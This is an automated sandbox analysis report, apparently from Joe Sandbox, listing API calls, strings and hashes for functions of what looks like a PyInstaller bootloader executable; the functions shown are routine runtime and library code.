Failed to obtain executable path., xrefs: 00007FF7FD7336F3
Failed to convert executable path to UTF-8., xrefs: 00007FF7FD733790
GetModuleFileNameW, xrefs: 00007FF7FD7336FA

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: c159c0c15f2176f8371251be1ee2efd5a41f65ef9f0ee41f384bd5cf2d797172
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: 72212C62B1C64281FB20BB25E8553BAA350AF8C394FC04232E57D8A6D5FE6CE505D7F1

Function 00007FF7FD74BACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD74BEF9

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
Instruction ID: 53c0256a7fb6a6e9da2550f8a545d208f5790556cc2fd8dd058cde3ed30fd06c
Opcode Fuzzy Hash: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
Instruction Fuzzy Hash: 8DC1F62290C686D1E752AB1590482BEE760FF8AB80FD50135EA6D0B3D5EF7CE84587F1

Function 00007FF7FD738760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7FD738780
OpenProcessToken.ADVAPI32 ref: 00007FF7FD738793
GetTokenInformation.KERNELBASE ref: 00007FF7FD7387B8
GetLastError.KERNEL32 ref: 00007FF7FD7387C2
GetTokenInformation.KERNELBASE ref: 00007FF7FD738802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7FD73881E
CloseHandle.KERNELBASE ref: 00007FF7FD738836

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction ID: 78063786770d890354a9759b6b7e335b7c75c199406f40a97ca51ae625e725a8
Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction Fuzzy Hash: 79215321A0C64642EB50AB55F45427AE3A0FFC97A0F900235EA7D4BAE4EFBDD44487F0

Function 00007FF7FD7390E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7FD738760: GetCurrentProcess.KERNEL32 ref: 00007FF7FD738780
Part of subcall function 00007FF7FD738760: OpenProcessToken.ADVAPI32 ref: 00007FF7FD738793
Part of subcall function 00007FF7FD738760: GetTokenInformation.KERNELBASE ref: 00007FF7FD7387B8
Part of subcall function 00007FF7FD738760: GetLastError.KERNEL32 ref: 00007FF7FD7387C2
Part of subcall function 00007FF7FD738760: GetTokenInformation.KERNELBASE ref: 00007FF7FD738802
Part of subcall function 00007FF7FD738760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7FD73881E
Part of subcall function 00007FF7FD738760: CloseHandle.KERNELBASE ref: 00007FF7FD738836

LocalFree.KERNEL32(?,00007FF7FD733C55), ref: 00007FF7FD73916C
LocalFree.KERNEL32(?,00007FF7FD733C55), ref: 00007FF7FD739175

Strings

S-1-3-4, xrefs: 00007FF7FD739121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF7FD739142
D:(A;;FA;;;%s), xrefs: 00007FF7FD739157
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF7FD739183

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: 2556527a95505124069f0df6804bbad54b764a542b68b240e7413c5dd3f2af4e
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 7A212A21A0CB4281E750BB50E9153EAA261EF8C780FD44031EA6D5BBD6EF7CD94597F0

Function 00007FF7FD737E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00000000,?,00007FF7FD73352C,?,00000000,00007FF7FD733F23), ref: 00007FF7FD737F22

Strings

\, xrefs: 00007FF7FD737E87
%.*s, xrefs: 00007FF7FD737EDB
%s%c, xrefs: 00007FF7FD737E94

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 8ca7fb79b4ea6b2c566bb37e9ebd00ba932afb87f6e77ad964f7d4209dd14296
Instruction ID: cfb2fa90d5dd17c57150a204df4da591455437baad3a82b4597b6fb4aecfccc9
Opcode Fuzzy Hash: 8ca7fb79b4ea6b2c566bb37e9ebd00ba932afb87f6e77ad964f7d4209dd14296
Instruction Fuzzy Hash: 9431E72161DAC245EB21A720A4517AAA354EB88BE0F840231EE7D4B7C9FF6CD20187F0

Function 00007FF7FD74CFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FD74CFBB), ref: 00007FF7FD74D0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FD74CFBB), ref: 00007FF7FD74D177

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: b0c0a287ab31274774254497bfb8285bf7e59fdf871b248b1fe85c6a3b000284
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: C9911732F1C651C5F752AF65844827DABA0AB4AB88F940139DE6E1B6C4EF38D442C7F0

Function 00007FF7FD74F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7FD74FAEC
_get_daylight.LIBCMT ref: 00007FF7FD74FAFD
_get_daylight.LIBCMT ref: 00007FF7FD74FB0E
_isindst.LIBCMT ref: 00007FF7FD74FBD9

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 3f78355ee83bf340c8cd72e337fc0ad527d04cb903964fa97a86928b2805bcfb
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: B3510672F0C151C6EB15EF3499596BCE761EB4A358F900235DE2D9AAE4EF38A401C7E0

Function 00007FF7FD7457EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF7FD74581F
GetFileInformationByHandle.KERNELBASE ref: 00007FF7FD745881
GetLastError.KERNEL32 ref: 00007FF7FD745912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FD745724), ref: 00007FF7FD74595E

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: 04005e42583174f7de8ce393704d3fb4b383e3d5b035ee9707ea10fb406a4e5a
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: F1519B22A0C641CAFB12EFA194543BDA3B1AB49B58F948535DE195B6C8EF38D44083F0

Function 00007FF7FD745698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7456C5
CreateFileW.KERNELBASE ref: 00007FF7FD745704
CloseHandle.KERNEL32 ref: 00007FF7FD745739

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
Instruction ID: 22e01440ca5fe82f76f5f0589f7368dbd3c3c133762025f231acf07065c1feae
Opcode Fuzzy Hash: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
Instruction Fuzzy Hash: 3A41C522D1C782C3E352AB219554379A360FB9A764F508335E66C0BAD5EF7CA4E087F0

Function 00007FF7FD73CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7FD73CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7FD73CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7FD73CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF7FD73CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7FD73CD91

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: 5cc47de31d2ce143fdc374167424b22d92fe0e5a83d3b733d76ed3d091bf787f
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: C8315911E1C50381FB64BB6598123BDA781AF4A384FC40438E92D4F2D7FEACA405E2F1

Function 00007FF7FD749AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7FD749A9C), ref: 00007FF7FD749AB1
TerminateProcess.KERNEL32(?,?,?,00007FF7FD749A9C), ref: 00007FF7FD749ABC
ExitProcess.KERNEL32 ref: 00007FF7FD749ACB

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: 721fbaf5cf746bf22abd12707b19b9207bfef36fb08f59774d676a9be0540e24
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: 6CD06C10B0D64682EB593B7058992789252AF4EB41F94143CD82B1E3D3FE2CA84983F2

Function 00007FF7FD7401AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7401F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7402E7

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 79cca4504dc648fe8aa8effeaf681342c190ebe107b53799f1e9e3922d2d4adb
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: D951F921A0D241C6E726BA25940867EA691BF4EBA4F944634DE7D0B7C5EF3CF401A6F0

Function 00007FF7FD74C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF7FD74C33D), ref: 00007FF7FD74C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF7FD74C33D), ref: 00007FF7FD74C1FA

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 893ec1bfc59b8ae72a36abd2edb391dc8f93d6cf575f9c71a77174c8aac1a625
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: C011C86161CA8181DB109B25A41416DE351FB4ABF4F944332EE7D4F7D9EE7CD01187E0

Function 00007FF7FD745994 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FD7458A9), ref: 00007FF7FD7459C7
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FD7458A9), ref: 00007FF7FD7459DD

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
Instruction ID: 2d4aae9c0b62579bf5b62c0b6a2d866679644f9f678846220c4b988c28743a4e
Opcode Fuzzy Hash: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
Instruction Fuzzy Hash: 4811913261C642C2EB55AB50A44513AF760FB89771F900236FAAD89AD8FF7CD014CBB0

Function 00007FF7FD74A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF7FD752D92,?,?,?,00007FF7FD752DCF,?,?,00000000,00007FF7FD753295,?,?,?,00007FF7FD7531C7), ref: 00007FF7FD74A9CE
GetLastError.KERNEL32(?,?,?,00007FF7FD752D92,?,?,?,00007FF7FD752DCF,?,?,00000000,00007FF7FD753295,?,?,?,00007FF7FD7531C7), ref: 00007FF7FD74A9D8

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: e95292e4ef5116d99fdb108e643526cbe3c690f350a18aba445e113676492382
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: D1E08611F0C60382FF057BB254492799250AF8D744FC50034D93D5E2E1FE2C688583F0

Function 00007FF7FD74ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF7FD74AA45,?,?,00000000,00007FF7FD74AAFA), ref: 00007FF7FD74AC36
GetLastError.KERNEL32(?,?,?,00007FF7FD74AA45,?,?,00000000,00007FF7FD74AAFA), ref: 00007FF7FD74AC40

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
